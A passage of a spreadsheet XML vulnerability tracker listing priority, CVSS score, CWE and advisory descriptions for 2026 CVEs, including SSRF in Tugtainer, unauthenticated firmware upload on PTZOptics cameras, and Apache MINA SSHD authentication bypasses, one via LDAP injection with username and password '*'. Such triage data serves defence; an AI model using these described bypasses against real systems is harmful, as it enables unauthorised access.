      <c r="S46"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renders message content that references external resources. Depending on the services reachable from the gateway, this could disclose sensitive internal information or trigger unintended actions on internal systems.</t>
        </is>
      </c>
      <c r="T46" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102105</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102106</t>
        </is>
      </c>
      <c r="D47" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E47" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F47" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr"/>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S47" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in a Kiteworks Email Protection Gateway administrative service. An administrative service in Kiteworks Email Protection Gateway did not consistently enforce administrator authentication, so the required password check could be bypassed. An attacker who referenced a valid administrator account could potentially create, modify, or delete internal users and managed domains and change their security-feature configuration without authenticating; deleting a managed domain also removes its user accounts and could lock administrators out of the gateway.</t>
        </is>
      </c>
      <c r="T47" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102106</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62308</t>
        </is>
      </c>
      <c r="D48" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E48" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F48" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr">
        <is>
          <t>docker, requests</t>
        </is>
      </c>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr"/>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S48" s="5" t="inlineStr">
        <is>
          <t>Tugtainer is a self-hosted app for automating updates of Docker containers. Prior to version 1.30.6, Tugtainer allows an authenticated user to make the backend server send outbound HTTP requests to arbitrary user-supplied URLs through the notification test endpoint. The /settings/test_notification endpoint accepts a urls field and passes it directly to Apprise without restricting protocols, hostnames, localhost addresses, private IP ranges, or cloud metadata addresses. This can be abused as an authenticated blind server-side request forgery (SSRF). This issue has been patched in version 1.30.6.</t>
        </is>
      </c>
      <c r="T48" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62308</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75969</t>
        </is>
      </c>
      <c r="D49" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E49" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F49" s="5" t="inlineStr">
        <is>
          <t>16cac6a8-cc1e-4741-89aa-6b97e2437706</t>
        </is>
      </c>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr"/>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S49" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability for all PTZOptics cameras and the Firmware Upgrade Tool - Firmware Update modules. A missing authentication vulnerability in the firmware update mechanism of affected PTZOptics cameras allows an unauthenticated user to install modified firmware on the device without administrator credentials.
This vulnerability allows attackers to upload modified firmware to the device without admin credentials. This issue affects:
  *  Move 4K 12X before: 0.0.98
  *  Move 4K 20X before: 0.1.33
  *  Move 4K 30X before: 2.1.17
  *  Link 4K 12X before: 0.0.99
  *  Link 4K 20X before: 0.1.37
  *  Link 4K 30X before: 2.1.18
  *  Move SE 12X before: 9.1.66
  *  Move SE 20X before: 9.1.44
  *  Move SE 30X before: 9.1.46
  *  Studio 4K 12X before: 8.3.32
  *  Studio 4K 20X before: 8.3.32
  *  Studio SE 12X before: 8.3.32
  *  Studio SE 20X before: 8.3.32
  *  All Generation 2 cameras, including: PT12X-SDI-GY-G2, PT12X-SDI-WH-G2, PT12X-NDI-GY-G2, PT12X-NDI-WH-G2; PT12X-USB-GY-G2, PT12X-USB-WH-G2; PT20X-SDI-GY-G2, PT20X-SDI-WH-G2, PT20X-NDI-GY-G2, PT20X-NDI-WH-G2; PT20X-USB-GY-G2, PT20X-USB-WH-G2; PT30X-SDI-GY-G2, PT30X-SDI-WH-G2, PT30X-NDI-GY-G2, PT30X-NDI-WH-G2; PTVL-ZCAM, PTVL-NDI-ZCAM; PTEPTZ-ZCAM-G2, PTEPTZ-NDI-ZCAM-G2; PT12X-ZCAM, PT12X-NDI-ZCAM; PT20X-ZCAM, PT20X-NDI-ZCAM; Studio Pro - All versions
  *  Upgrade Tool - All versions</t>
        </is>
      </c>
      <c r="T49" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75969</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77185</t>
        </is>
      </c>
      <c r="D50" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E50" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F50" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr"/>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t>CWE-305</t>
        </is>
      </c>
      <c r="S50" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass in sshd-core in Apache MINA SSHD versions 2.0.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5 for a certain (presumed rare) way to implement an SSH server.
Apache MINA SSHD is a Java library for client- and server-side SSH. In the server part of the library, a mechanism to perform "asynchronous authentication" exists. A server implemented with Apache MINA SSHD must contain explicit code to make use of this feature. The implementation of this feature was flawed and could potentially lead to skipping checking the signature in public-key or hostbased authentication, or returning a wrong result.
Users are recommended to upgrade to Apache MINA SSHD 2.20.0 or 3.0.0-M6, which fix the logic error and which additionally forbid the use of this "asynchronous authentication" mechanism with the public-key or hostbased authentication schemes: if used, the SSH session will be closed and the server will log an entry indicating that asynchronous authentication may be used only with password or keyboard-interactive authentication.</t>
        </is>
      </c>
      <c r="T50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77185</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87830</t>
        </is>
      </c>
      <c r="D51" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E51" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F51" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr"/>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t>CWE-917</t>
        </is>
      </c>
      <c r="S51" s="5" t="inlineStr">
        <is>
          <t>In the StAX streaming WS-SecurityPolicy validator, certain relative or unsupported XPath expressions can be converted into paths that never match the actual XML element path. A remote SOAP peer may therefore send a required element without the expected signature or encryption.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T51" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87830</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89238</t>
        </is>
      </c>
      <c r="D52" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E52" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F52" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr"/>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S52" s="5" t="inlineStr">
        <is>
          <t>WSS4J EncryptedHeader child confusion could promote an attacker-controlled plaintext element as the decrypted header, leading to incorrect confidentiality coverage and possible policy bypass.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T52" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89238</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92966</t>
        </is>
      </c>
      <c r="D53" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr"/>
      <c r="M53" s="5" t="inlineStr"/>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P53" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q53" s="5" t="inlineStr"/>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S53" s="5" t="inlineStr">
        <is>
          <t>The The Appointment Booking Plugin – LatePoint | Calendar &amp; Scheduling for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.7.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. The payload is planted during the unauthenticated booking flow and triggered when the Customer Cabinet block rendered by render_customer_dashboard() outputs the stored name into the content stream, where WordPress core's do_shortcode filter at priority 11 re-parses and executes it.</t>
        </is>
      </c>
      <c r="T53" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92966</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94052</t>
        </is>
      </c>
      <c r="D54" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E54" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F54" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr"/>
      <c r="M54" s="5" t="inlineStr"/>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>CWE-304</t>
        </is>
      </c>
      <c r="S54" s="5" t="inlineStr">
        <is>
          <t>A missing check in LdapPasswordAuthenticator in component sshd-ldap in Apache MINA SSHD versions 1.2.0 to 2.19.0 or 3.0.0-M1 to 3.0.0-M5 bypassed authentication checks.
Apache MINA SSHD is a Java library for client-side and server-side SSH. The optional sshd-ldap component provides support for integrating password and publickey authentication on the server side with an LDAP server.
sshd-ldap is an optional component. SSH servers implemented with Apache MINA SSHD are affected only if they use sshd-ldap and do configure an LdapPasswordAuthenticator to be used for password authentication. Normal password authentication via the built-in mechanisms in sshd-core is _not_ affected by this vulnerability, which concerns only LdapPasswordAuthenticator.
Users are recommended to upgrade affected applications to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T54" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94052</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94053</t>
        </is>
      </c>
      <c r="D55" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E55" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F55" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G55" s="5" t="inlineStr"/>
      <c r="H55" s="5" t="inlineStr"/>
      <c r="I55" s="5" t="inlineStr"/>
      <c r="J55" s="5" t="inlineStr"/>
      <c r="K55" s="5" t="inlineStr"/>
      <c r="L55" s="5" t="inlineStr"/>
      <c r="M55" s="5" t="inlineStr"/>
      <c r="N55" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P55" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q55" s="5" t="inlineStr"/>
      <c r="R55" s="5" t="inlineStr">
        <is>
          <t>CWE-305, CWE-90</t>
        </is>
      </c>
      <c r="S55" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass via LDAP injection in component sshd-ldap in Apache MINA SSHD versions 1.2.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5.
Apache MINA SSHD is a Java library for client-side and server-side SSH. 
The optional sshd-ldap component provides support for integrating 
password and publickey authentication on the server side with an LDAP 
server.
sshd-ldap is an optional component. SSH servers implemented with Apache 
MINA SSHD are affected only if they use sshd-ldap and do configure it to be used for password of public key authentication.
Other Apache MINA SSHD servers are not affected.
Lack of escaping LDAP filter metacharacters enabled successful authentication with username "*" and password "*".
Users are recommended to upgrade affected applications to version 2.20.0 or 3.0.0-M6, which fix this issue by properly escaping filter parameters according to RFC 4515.</t>
        </is>
      </c>
      <c r="T55" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94053</t>
        </is>
      </c>
    </row>
    <row r="56">
      <c r="A56" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B56" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C56" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97196</t>
        </is>
      </c>
      <c r="D56" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E56" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F56" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G56" s="5" t="inlineStr"/>
      <c r="H56" s="5" t="inlineStr"/>
      <c r="I56" s="5" t="inlineStr"/>
      <c r="J56" s="5" t="inlineStr"/>
      <c r="K56" s="5" t="inlineStr"/>
      <c r="L56" s="5" t="inlineStr"/>
      <c r="M56" s="5" t="inlineStr"/>
      <c r="N56" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P56" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q56" s="5" t="inlineStr"/>
      <c r="R56" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="S56" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Unsafe Equivalence in Input vulnerability in Liquid Web / StellarWP GiveWP allows Authentication Bypass.
This issue affects GiveWP: from n/a through 4.16.9.</t>
        </is>
      </c>
      <c r="T56" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97196</t>
        </is>
      </c>
    </row>
    <row r="57">
      <c r="A57" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B57" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C57" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55176</t>
        </is>
      </c>
      <c r="D57" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E57" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F57" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G57" s="5" t="inlineStr"/>
      <c r="H57" s="5" t="inlineStr"/>
      <c r="I57" s="5" t="inlineStr"/>
      <c r="J57" s="5" t="inlineStr"/>
      <c r="K57" s="5" t="inlineStr"/>
      <c r="L57" s="5" t="inlineStr"/>
      <c r="M57" s="5" t="inlineStr"/>
      <c r="N57" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P57" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q57" s="5" t="inlineStr"/>
      <c r="R57" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S57" s="5" t="inlineStr">
        <is>
          <t>Soft Machine is a Virtual Machine–based agentic development environment / Cloud OS. In versions 0.2.247 and prior, two authentication helpers in /app/server.js — verifyContainerAuth() and authenticateWorkspaceHttp() — accept the global CONTAINER_SHARED_SECRET as a bearer token without verifying which workspace the caller belongs to. Because that secret is set identically on every container in the Fly app and is reachable from the user-facing process environment inside each workspace, any tenant can use it to authenticate to any other tenant's workspace API. The result is cross-workspace read, write, and destructive-restore primitives reachable from any paying customer's shell. The existing per-workspace token check (workspaceTokenMatches) protects the user-facing per-workspace token path, but the shared-secret bearer path bypasses it entirely. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="T57" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55176</t>
        </is>
      </c>
    </row>
    <row r="58">
      <c r="A58" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B58" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C58" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94389</t>
        </is>
      </c>
      <c r="D58" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E58" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F58" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G58" s="5" t="inlineStr"/>
      <c r="H58" s="5" t="inlineStr"/>
      <c r="I58" s="5" t="inlineStr"/>
      <c r="J58" s="5" t="inlineStr"/>
      <c r="K58" s="5" t="inlineStr"/>
      <c r="L58" s="5" t="inlineStr"/>
      <c r="M58" s="5" t="inlineStr"/>
      <c r="N58" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P58" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q58" s="5" t="inlineStr"/>
      <c r="R58" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S58" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Remote Code Execution (RCE) in AcyMailing SMTP Newsletter &lt;= 11.0.5 versions.</t>
        </is>
      </c>
      <c r="T58" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94389</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100277</t>
        </is>
      </c>
      <c r="D59" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E59" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F59" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr"/>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S59" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 account takeover was possible by replaying a notification signature</t>
        </is>
      </c>
      <c r="T59" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100277</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13313</t>
        </is>
      </c>
      <c r="D60" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E60" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F60" s="5" t="inlineStr">
        <is>
          <t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t>
        </is>
      </c>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr"/>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="S60" s="5" t="inlineStr">
        <is>
          <t>An Active Debug Code vulnerability in certain ASUS router models allows a remote authenticated user, via a crafted HTTP request, to bypass security mechanisms and enable the Telnet service, thereby executing arbitrary commands with root privileges and potentially affecting other devices connected to the router.
Refer to the ' Security Update for ASUS Router Firmware ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="T60" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13313</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100253</t>
        </is>
      </c>
      <c r="D61" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E61" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F61" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
